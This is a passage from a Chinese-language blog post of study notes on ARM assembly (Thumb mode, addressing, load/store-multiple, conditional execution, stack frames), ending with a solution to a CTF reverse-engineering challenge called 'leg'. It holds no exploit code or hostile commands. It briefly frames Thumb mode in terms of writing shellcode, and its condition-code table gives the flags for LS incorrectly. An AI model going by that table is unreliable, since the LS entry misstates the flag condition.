<h3 id="Thumb"><a href="#Thumb" class="headerlink" title="Thumb"></a>Thumb</h3><p>When writing ARM shellcode, we need to get rid of NULL bytes and using 16-bit Thumb instructions instead of 32-bit ARM instructions reduces the chance of having them</p>
<p>可以用BX还有BLX指令设置寄存器最低位为1来切换ARM和Thumb模式，执行的时候最低位会被忽略所以不会产生地址对齐问题</p>
<p>具体的指令格式相关还是看<a href="https://azeria-labs.com/arm-instruction-set-part-3/" target="_blank" rel="noopener">教程</a>吧….这里记一个大概</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">MNEMONIC&#123;S&#125;&#123;condition&#125; &#123;Rd&#125;, Operand1, Operand2</span><br><span class="line">MNEMONIC     - 指令助记符</span><br><span class="line">&#123;S&#125;          - 可选后缀，如果设置S，flags将根据操作结果进行更新</span><br><span class="line">&#123;condition&#125;  - 执行指令所需的条件</span><br><span class="line">&#123;Rd&#125;         - 目的寄存器，用于存储指令结果（不过后续提到的ldm不是）</span><br><span class="line">Operand1     - 寄存器或者立即数 </span><br><span class="line">Operand2     - 立即数或寄存器（可用于增加、偏移）</span><br></pre></td></tr></table></figure>

<h3 id="几种寻址方式"><a href="#几种寻址方式" class="headerlink" title="几种寻址方式"></a>几种寻址方式</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">ldr r2, [r0]         最普通的，有效地址就是r0的值(r0)</span><br><span class="line">ldr r1, [pc, #12]    这里有效地址是(PC)+12(arm模式 4单位对齐)，不是当前执行指令地址加12</span><br><span class="line"></span><br><span class="line">str r2, [r1, #2]     这里有效地址是(r1)+2，r1不发生更改，offset</span><br><span class="line">str r2, [r1, #4]!    这里有效地址是(r1)+4，第一操作数有感叹号，所以r1发生更改 r1&#x3D;r1+4 ，pre-indexed</span><br><span class="line">ldr r3, [r1], #4     这里有效地址是(r1)，r1发生更改 r1&#x3D;r1+4 ，post-indexed</span><br><span class="line"></span><br><span class="line">str r2, [r1, r2]</span><br><span class="line">str r2, [r1, r2]!</span><br><span class="line">ldr r3, [r1], r2</span><br><span class="line">这三种跟上面比较相似，只不过是把立即数换成了r2寄存器的值，更改的依然是r1(用r2的值相加)</span><br><span class="line"></span><br><span class="line">str r2, [r1, r2, LSL#2]   有效地址是(r1) + ((r2)&lt;&lt;2)，offset</span><br><span class="line">str r2, [r1, r2, LSL#2]!  有效地址是(r1) + ((r2)&lt;&lt;2)，r1发生更改 r1&#x3D; (r1) + ((r2)&lt;&lt;2) ，pre-indexed</span><br><span class="line">ldr r3, [r1], r2, LSL#2   有效地址是(r1)，r1发生更改 r1&#x3D; (r1) + ((r2)&lt;&lt;2) ，post-indexed</span><br></pre></td></tr></table></figure>

<p>ARM中的立即数是最后操作数12中的，前8位（n）和后4位（r）的组合表示， v = n ror 2*r，循环右移得到，用于12位表示32位数</p>
<h3 id="访存指令-Multiple-amp-后缀"><a href="#访存指令-Multiple-amp-后缀" class="headerlink" title="访存指令(Multiple)&amp;后缀"></a>访存指令(Multiple)&amp;后缀</h3><p>这里有一串类似猝发式传送的指令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">adr r0, words+12             &#x2F;* address of words[3] -&gt; r0 ，adr是取地址的指令*&#x2F;</span><br><span class="line">ldr r1, array_buff_bridge    &#x2F;* address of array_buff[0] -&gt; r1 *&#x2F;</span><br><span class="line">ldr r2, array_buff_bridge+4  &#x2F;* address of array_buff[2] -&gt; r2 *&#x2F;</span><br><span class="line"></span><br><span class="line">ldm r0, &#123;r4,r5&#125;              &#x2F;* words[3] -&gt; r4 &#x3D; 0x03; words[4] -&gt; r5 &#x3D; 0x04 *&#x2F;</span><br><span class="line">&#x2F;&#x2F;ldm：load多个数据到目的寄存器，这里是将r0指向的连续内存数据分别load到r4 r5，默认情况下是r0增加的连续方向，此时执行后r0的值不会变</span><br><span class="line">stm r1, &#123;r4,r5&#125;              &#x2F;* r4 -&gt; array_buff[0] &#x3D; 0x03; r5 -&gt; array_buff[1] &#x3D; 0x04 *&#x2F;</span><br><span class="line">&#x2F;&#x2F;stm则是将r4 45中的内容存到r1所指的连续内存，默认也是r0增加方向，此时r1值不改变</span><br><span class="line"></span><br><span class="line">ldmia r0, &#123;r4-r6&#125;            &#x2F;* words[3] -&gt; r4 &#x3D; 0x03, words[4] -&gt; r5 &#x3D; 0x04; words[5] -&gt; r6 &#x3D; 0x05; *&#x2F;</span><br><span class="line">stmia r1, &#123;r4-r6&#125;            &#x2F;* r4 -&gt; array_buff[0] &#x3D; 0x03; r5 -&gt; array_buff[1] &#x3D; 0x04; r6 -&gt; array_buff[2] &#x3D; 0x05 *&#x2F;</span><br><span class="line">&#x2F;&#x2F;这里是后缀的介绍还有指令写法可以写成r4-46，这样就是存3个了</span><br><span class="line">&#x2F;&#x2F;后缀具体代表 -IA (increase after), -IB (increase before), -DA (decrease after), -DB (decrease before)</span><br><span class="line"></span><br><span class="line">ldmib r0, &#123;r4-r6&#125;            &#x2F;* words[4] -&gt; r4 &#x3D; 0x04; words[5] -&gt; r5 &#x3D; 0x05; words[6] -&gt; r6 &#x3D; 0x06 *&#x2F;</span><br><span class="line">stmib r1, &#123;r4-r6&#125;            &#x2F;* r4 -&gt; array_buff[1] &#x3D; 0x04; r5 -&gt; array_buff[2] &#x3D; 0x05; r6 -&gt; array_buff[3] &#x3D; 0x06 *&#x2F;</span><br><span class="line">ldmda r0, &#123;r4-r6&#125;            &#x2F;* words[3] -&gt; r6 &#x3D; 0x03; words[2] -&gt; r5 &#x3D; 0x02; words[1] -&gt; r4 &#x3D; 0x01 *&#x2F;</span><br><span class="line">ldmdb r0, &#123;r4-r6&#125;            &#x2F;* words[2] -&gt; r6 &#x3D; 0x02; words[1] -&gt; r5 &#x3D; 0x01; words[0] -&gt; r4 &#x3D; 0x00 *&#x2F;</span><br><span class="line">stmda r2, &#123;r4-r6&#125;            &#x2F;* r6 -&gt; array_buff[2] &#x3D; 0x02; r5 -&gt; array_buff[1] &#x3D; 0x01; r4 -&gt; array_buff[0] &#x3D; 0x00 *&#x2F;</span><br><span class="line">stmdb r2, &#123;r4-r5&#125;            &#x2F;* r5 -&gt; array_buff[1] &#x3D; 0x01; r4 -&gt; array_buff[0] &#x3D; 0x00; *&#x2F;</span><br><span class="line">&#x2F;&#x2F;后缀的不同用法，I(x)时指令后面的寄存器操作顺序是顺着来的，D(x)时指令后面的寄存器操作顺序是逆着来的，要注意差别。这里第一个寄存器都不会发生改变</span><br><span class="line"></span><br><span class="line">bx lr</span><br></pre></td></tr></table></figure>

<h3 id="push-amp-pop"><a href="#push-amp-pop" class="headerlink" title="push&amp;pop"></a>push&amp;pop</h3><p>ARM中虽然直接写stmdb sp!, {r0, r1}    ldmia sp!, {r4, r5} 在汇编会被翻译为 push {r0, r1}    pop {r4, r5}<br>但push , pop本质上是stmdb sp!和ldmia sp!的代名词</p>
<p>所以push操作时是先push r1再push r0，从右到左；pop操作时是先pop r4再pop r5，从左到右；</p>
<h3 id="条件执行相关"><a href="#条件执行相关" class="headerlink" title="条件执行相关"></a>条件执行相关</h3><p>下表列出了ARM中可用的条件代码，它们的含义以及测试的标志，条件码跟着指令助记符满足指令格式就行，比如addlt,addsne</p>
<table>
<thead>
<tr>
<th>Condition Code</th>
<th>Meaning (for cmp or subs)</th>
<th>Status of Flags</th>
</tr>
</thead>
<tbody><tr>
<td>EQ</td>
<td>Equal</td>
<td>Z==1</td>
</tr>
<tr>
<td>NE</td>
<td>Not Equal</td>
<td>Z==0</td>
</tr>
<tr>
<td>GT</td>
<td>Signed Greater Than</td>
<td>(Z==0) &amp;&amp; (N==V)</td>
</tr>
<tr>
<td>LT</td>
<td>Signed Less Than</td>
<td>N!=V</td>
</tr>
<tr>
<td>GE</td>
<td>Signed Greater Than or Equal</td>
<td>N==V</td>
</tr>
<tr>
<td>LE</td>
<td>Signed Less Than or Equal</td>
<td>(Z==1) || (N!=V)</td>
</tr>
<tr>
<td>CS or HS</td>
<td>Unsigned Higher or Same (or Carry Set)</td>
<td>C==1</td>
</tr>
<tr>
<td>CC or LO</td>
<td>Unsigned Lower (or Carry Clear)</td>
<td>C==0</td>
</tr>
<tr>
<td>MI</td>
<td>Negative (or Minus)</td>
<td>N==1</td>
</tr>
<tr>
<td>PL</td>
<td>Positive (or Plus)</td>
<td>N==0</td>
</tr>
<tr>
<td>AL</td>
<td>Always executed</td>
<td>–</td>
</tr>
<tr>
<td>NV</td>
<td>Never executed</td>
<td>–</td>
</tr>
<tr>
<td>VS</td>
<td>Signed Overflow</td>
<td>V==1</td>
</tr>
<tr>
<td>VC</td>
<td>No signed Overflow</td>
<td>V==0</td>
</tr>
<tr>
<td>HI</td>
<td>Unsigned Higher</td>
<td>(C==1) &amp;&amp; (Z==0)</td>
</tr>
<tr>
<td>LS</td>
<td>Unsigned Lower or same</td>
<td>(C==0) || (Z==0)</td>
</tr>
</tbody></table>
<p>Thumb模式下有分支条件执行，语法格式是这样的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Syntax: IT&#123;x&#123;y&#123;z&#125;&#125;&#125; cond  ,IT指令之后会跟一个条件执行块，最多四条指令，这四条指令的条件都由这条IT指令指出</span><br><span class="line"></span><br><span class="line">cond specifies the condition for the first instruction in the IT block（cond指出第一条指令的执行条件）</span><br><span class="line">x specifies the condition switch for the second instruction in the IT block（x指出第二条指令执行的条件是不是和cond一样，如果x是T，那么第二条指令和cond条件相同；如果是E，那么第二条指令和cond条件相反）</span><br><span class="line">y specifies the condition switch for the third instruction in the IT block（同上）</span><br><span class="line">z specifies the condition switch for the fourth instruction in the IT block（同上）</span><br></pre></td></tr></table></figure>

<p>所以Thumb模式下的条件执行指令块看起来就是这样的（这里直接偷图了）：</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210111000847458.png" alt="image-20210111000847458" style="zoom:80%;">

<p>里面每个指令都是带条件的，并且符合IT指令的声明，常见的条件和相反条件有如下几个</p>
<table>
<thead>
<tr>
<th>Code</th>
<th>Meaning</th>
<th>Code</th>
<th>Meaning</th>
</tr>
</thead>
<tbody><tr>
<td>EQ</td>
<td>Equal</td>
<td>NE</td>
<td>Not Equal</td>
</tr>
<tr>
<td>HS (or CS)</td>
<td>Unsigned higher or same (or carry set)</td>
<td>LO (or CC)</td>
<td>Unsigned lower (or carry clear)</td>
</tr>
<tr>
<td>MI</td>
<td>Negative</td>
<td>PL</td>
<td>Positive or Zero</td>
</tr>
<tr>
<td>VS</td>
<td>Signed Overflow</td>
<td>VC</td>
<td>No Signed Overflow</td>
</tr>
<tr>
<td>HI</td>
<td>Unsigned Higher</td>
<td>LS</td>
<td>Unsigned Lower or Same</td>
</tr>
<tr>
<td>GE</td>
<td>Signed Greater Than or Equal</td>
<td>LT</td>
<td>Signed Less Than</td>
</tr>
<tr>
<td>GT</td>
<td>Signed Greater Than</td>
<td>LE</td>
<td>Signed Less Than or Equal</td>
</tr>
<tr>
<td>AL (or omitted)</td>
<td>Always Executed</td>
<td>(There is no opposite to AL)</td>
<td></td>
</tr>
</tbody></table>
<p>这里还有一段比较典型的将ARM切换成Thumb模式的代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">.syntax unified    @ this is important!</span><br><span class="line">.text</span><br><span class="line">.global _start</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line">    .code 32</span><br><span class="line">    add r3, pc, #1   @ increase value of PC by 1 and add it to R3，执行到这里时PC指向cmp指令</span><br><span class="line">    bx r3            @ branch + exchange to the address in R3 -&gt; switch to Thumb state because LSB &#x3D; 1</span><br><span class="line"></span><br><span class="line">    .code 16         @ Thumb state</span><br><span class="line">    cmp r0, #10      </span><br><span class="line">    ite eq           @ if R0 is equal 10...</span><br><span class="line">    addeq r1, #2     @ ... then R1 &#x3D; R1 + 2</span><br><span class="line">    addne r1, #3     @ ... else R1 &#x3D; R1 + 3</span><br><span class="line">    bkpt</span><br></pre></td></tr></table></figure>

<h3 id="分支指令（跳转）"><a href="#分支指令（跳转）" class="headerlink" title="分支指令（跳转）"></a>分支指令（跳转）</h3><p>三种分支指令：</p>
<ul>
<li>Branch (B)<ul>
<li>简单跳转</li>
</ul>
</li>
<li>Branch link (BL)<ul>
<li>将(当前执行指令地址+4)存入LR寄存器再跳转</li>
</ul>
</li>
<li>Branch exchange (BX) and Branch link exchange (BLX)<ul>
<li>和B/BL指令一样步骤 然后最低位为1时会切换模式 (ARM &lt;-&gt; Thumb)</li>
<li>必须用寄存器作为操作数</li>
</ul>
</li>
</ul>
<p>然后就是加上条件执行变成条件跳转了（跳转之后由于PC特性，会多读跳转目的处两条指令，实现自动PC+8？）</p>
<h3 id="函数栈"><a href="#函数栈" class="headerlink" title="函数栈"></a>函数栈</h3><p>先来看一个函数代码对应的汇编</p>
<p>main函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> <span class="keyword">int</span> res = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">int</span> a = <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">int</span> b = <span class="number">2</span>;</span><br><span class="line"> res = <span class="built_in">max</span>(a, b);</span><br><span class="line"> <span class="keyword">return</span> res;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">Dump of assembler code for function main:</span><br><span class="line">&#x3D;&gt; 0x000103e8 &lt;+0&gt;:		push	&#123;r11, lr&#125;  @最开始执行到main时，lr存放的是&lt;__libc_start_main+276&gt; bl 0xb6ea4b28 &lt;__GI_exit&gt;，就是说这里将本函数的返回地址先存到了栈上</span><br><span class="line">@然后r11存放的是前一个函数的栈帧地址（作用等于rbp吧）</span><br><span class="line">   0x000103ec &lt;+4&gt;:		add	r11, sp, #4 @新栈帧地址 直接sp+4得到，指向存放的lr</span><br><span class="line">   0x000103f0 &lt;+8&gt;:		sub	sp, sp, #16 @开辟了4*4字节大小的栈帧</span><br><span class="line">   0x000103f4 &lt;+12&gt;:	mov	r3, #0</span><br><span class="line">   0x000103f8 &lt;+16&gt;:	str	r3, [r11, #-8] @r11-8处存放0（res）</span><br><span class="line">   0x000103fc &lt;+20&gt;:	mov	r3, #1</span><br><span class="line">   0x00010400 &lt;+24&gt;:	str	r3, [r11, #-12] @r11-12处存放1（a）</span><br><span class="line">   0x00010404 &lt;+28&gt;:	mov	r3, #2</span><br><span class="line">   0x00010408 &lt;+32&gt;:	str	r3, [r11, #-16] @r11-16处存放2（b）</span><br><span class="line">   0x0001040c &lt;+36&gt;:	ldr	r0, [r11, #-12] @开始给要调用的函数赋值参数，把1给r0</span><br><span class="line">   0x00010410 &lt;+40&gt;:	ldr	r1, [r11, #-16] @把2给r1，这里可以看出来参数传递顺序</span><br><span class="line">   0x00010414 &lt;+44&gt;:	bl	0x1042c &lt;max&gt;   @把下个函数的返回地址存到lr后调用函数</span><br><span class="line">   0x00010418 &lt;+48&gt;:	str	r0, [r11, #-8]  @(返回值赋给res，然后再给r0)</span><br><span class="line">   0x0001041c &lt;+52&gt;:	ldr	r3, [r11, #-8]</span><br><span class="line">   0x00010420 &lt;+56&gt;:	mov	r0, r3</span><br><span class="line">   0x00010424 &lt;+60&gt;:	sub	sp, r11, #4</span><br><span class="line">   0x00010428 &lt;+64&gt;:	pop	&#123;r11, pc&#125; @这里由于PC的特性，感觉将之前的lr内容给到PC之后，PC自己又会自动+8多读两条指令</span><br></pre></td></tr></table></figure>

<p>上面代码中执行到+32处时栈帧看起来就是这样的（我这里sp指向栈顶后一个单元，可能有些实现会有不同）：</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210111163416232.png" alt="image-20210111163416232" style="zoom:80%;">

<p>再来看max：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">max</span><span class="params">(<span class="keyword">int</span> a,<span class="keyword">int</span> b)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> do_nothing();</span><br><span class="line"> <span class="keyword">if</span>(a&lt;b) <span class="keyword">return</span> b;</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">return</span> a;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">Dump of assembler code for function max:	@这里就不一行行解释了</span><br><span class="line">&#x3D;&gt; 0x0001042c &lt;+0&gt;:		push	&#123;r11, lr&#125;</span><br><span class="line">   0x00010430 &lt;+4&gt;:		add	r11, sp, #4</span><br><span class="line">   0x00010434 &lt;+8&gt;:		sub	sp, sp, #8</span><br><span class="line">   0x00010438 &lt;+12&gt;:	str	r0, [r11, #-8]</span><br><span class="line">   0x0001043c &lt;+16&gt;:	str	r1, [r11, #-12]</span><br><span class="line">   0x00010440 &lt;+20&gt;:	bl	0x1046c &lt;do_nothing&gt; @lr存入下一条指令地址然后跳转到do_nothing</span><br><span class="line">   0x00010444 &lt;+24&gt;:	ldr	r2, [r11, #-8]</span><br><span class="line">   0x00010448 &lt;+28&gt;:	ldr	r3, [r11, #-12]</span><br><span class="line">   0x0001044c &lt;+32&gt;:	cmp	r2, r3</span><br><span class="line">   0x00010450 &lt;+36&gt;:	bge	0x1045c &lt;max+48&gt;</span><br><span class="line">   0x00010454 &lt;+40&gt;:	ldr	r3, [r11, #-12]</span><br><span class="line">   0x00010458 &lt;+44&gt;:	b	0x10460 &lt;max+52&gt;</span><br><span class="line">   0x0001045c &lt;+48&gt;:	ldr	r3, [r11, #-8]</span><br><span class="line">   0x00010460 &lt;+52&gt;:	mov	r0, r3</span><br><span class="line">   0x00010464 &lt;+56&gt;:	sub	sp, r11, #4</span><br><span class="line">   0x00010468 &lt;+60&gt;:	pop	&#123;r11, pc&#125;</span><br></pre></td></tr></table></figure>

<p>do_nothing：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">do_nothing</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Dump of assembler code for function do_nothing:	@由于do_nothing没有再调用其他函数，所以没有push lr，返回时也是直接bx lr</span><br><span class="line">&#x3D;&gt; 0x0001046c &lt;+0&gt;:		push	&#123;r11&#125;		; (str r11, [sp, #-4]!)</span><br><span class="line">   0x00010470 &lt;+4&gt;:		add	r11, sp, #0</span><br><span class="line">   0x00010474 &lt;+8&gt;:		mov	r3, #0</span><br><span class="line">   0x00010478 &lt;+12&gt;:	mov	r0, r3</span><br><span class="line">   0x0001047c &lt;+16&gt;:	sub	sp, r11, #0</span><br><span class="line">   0x00010480 &lt;+20&gt;:	pop	&#123;r11&#125;		; (ldr r11, [sp], #4)</span><br><span class="line">   0x00010484 &lt;+24&gt;:	bx	lr</span><br></pre></td></tr></table></figure>

<p>把函数调用看做一个树形结构的话，这里也可以看出叶子函数和非叶子函数的区别</p>
<p>OK到此为止对ARM的一些基础就知道的差不多了，来写题吧</p>
<h2 id="leg"><a href="#leg" class="headerlink" title="leg"></a>leg</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;                                      </span><br><span class="line">        <span class="keyword">int</span> key=<span class="number">0</span>;                               </span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"Daddy has very strong arm! : "</span>); </span><br><span class="line">        <span class="built_in">scanf</span>(<span class="string">"%d"</span>, &amp;key);                       </span><br><span class="line">        <span class="keyword">if</span>( (key1()+key2()+key3()) == key )&#123;     </span><br><span class="line">                <span class="built_in">printf</span>(<span class="string">"Congratz!\n"</span>);           </span><br><span class="line">                <span class="keyword">int</span> fd = <span class="built_in">open</span>(<span class="string">"flag"</span>, O_RDONLY); </span><br><span class="line">                <span class="keyword">char</span> buf[<span class="number">100</span>];                   </span><br><span class="line">                <span class="keyword">int</span> r = <span class="built_in">read</span>(fd, buf, <span class="number">100</span>);      </span><br><span class="line">                <span class="built_in">write</span>(<span class="number">0</span>, buf, r);                </span><br><span class="line">        &#125;                                        </span><br><span class="line">        <span class="keyword">else</span>&#123;                                    </span><br><span class="line">                <span class="built_in">printf</span>(<span class="string">"I have strong leg :P\n"</span>);</span><br><span class="line">        &#125;                                        </span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;                                </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>从c语言内容可以看出来，主要就是看key1、key2、key3的汇编然后计算和即可，先来看key1</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Dump of assembler code for function key1:                          </span><br><span class="line">   0x00008cd4 &lt;+0&gt;:     push    &#123;r11&#125;       ; (str r11, [sp, #-4]!)</span><br><span class="line">   0x00008cd8 &lt;+4&gt;:     add r11, sp, #0                            </span><br><span class="line">   0x00008cdc &lt;+8&gt;:     mov r3, pc                                 </span><br><span class="line">   0x00008ce0 &lt;+12&gt;:    mov r0, r3                                 </span><br><span class="line">   0x00008ce4 &lt;+16&gt;:    sub sp, r11, #0                            </span><br><span class="line">   0x00008ce8 &lt;+20&gt;:    pop &#123;r11&#125;       ; (ldr r11, [sp], #4)      </span><br><span class="line">   0x00008cec &lt;+24&gt;:    bx  lr</span><br></pre></td></tr></table></figure>

<p>这里就是考PC的特性，指向后两条指令处，即<code>0x00008ce4</code>，再来看key2</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Dump of assembler code for function key2:                      </span><br><span class="line">   0x00008cf0 &lt;+0&gt;: 	push    &#123;r11&#125;       ; (str r11, [sp, #-4]!)</span><br><span class="line">   0x00008cf4 &lt;+4&gt;: 	add r11, sp, #0</span><br><span class="line">   0x00008cf8 &lt;+8&gt;: 	push    &#123;r6&#125;        ; (str r6, [sp, #-4]!)</span><br><span class="line">   0x00008cfc &lt;+12&gt;:    add r6, pc, #1</span><br><span class="line">   0x00008d00 &lt;+16&gt;:    bx  r6</span><br><span class="line">   0x00008d04 &lt;+20&gt;:    mov r3, pc     @跳转到这里的时候切成了Thumb模式，然后将r3赋值0x00008d08</span><br><span class="line">   0x00008d06 &lt;+22&gt;:    adds    r3, #4 @ r3&#x3D;0x00008d0C</span><br><span class="line">   0x00008d08 &lt;+24&gt;:    push    &#123;r3&#125;</span><br><span class="line">   0x00008d0a &lt;+26&gt;:    pop &#123;pc&#125;       @这里就是类似花指令的操作，接着执行</span><br><span class="line">   0x00008d0c &lt;+28&gt;:    pop &#123;r6&#125;        ; (ldr r6, [sp], #4)</span><br><span class="line">   0x00008d10 &lt;+32&gt;:    mov r0, r3     @此时r3&#x3D;0x00008d0C</span><br><span class="line">   0x00008d14 &lt;+36&gt;:    sub sp, r11, #0</span><br><span class="line">   0x00008d18 &lt;+40&gt;:    pop &#123;r11&#125;       ; (ldr r11, [sp], #4)</span><br><span class="line">   0x00008d1c &lt;+44&gt;:    bx  lr</span><br></pre></td></tr></table></figure>

<p>所以key2返回<code>0x00008d0C</code>，再来看key3</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Dump of assembler code for function key3:                      </span><br><span class="line">   0x00008d20 &lt;+0&gt;: 	push    &#123;r11&#125;       ; (str r11, [sp, #-4]!)</span><br><span class="line">   0x00008d24 &lt;+4&gt;: 	add r11, sp, #0</span><br><span class="line">   0x00008d28 &lt;+8&gt;: 	mov r3, lr</span><br><span class="line">   0x00008d2c &lt;+12&gt;:    mov r0, r3</span><br><span class="line">   0x00008d30 &lt;+16&gt;:    sub sp, r11, #0</span><br><span class="line">   0x00008d34 &lt;+20&gt;:    pop &#123;r11&#125;       ; (ldr r11, [sp], #4)</span><br><span class="line">   0x00008d38 &lt;+24&gt;:    bx  lr</span><br></pre></td></tr></table></figure>

<p>这里lr存的是在main里面的返回地址，去main里面看就知道是<code>0x00008d80</code></p>
<p>所以加起来就是0x1A770→108400，ssh过去就可以得到flag</p>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/08/ret2dl/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2020/04/08/ret2dl/" class="post-title-link" itemprop="url">ret2dl</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-04-08 05:07:36" itemprop="dateCreated datePublished" datetime="2020-04-08T05:07:36+08:00">2020-04-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
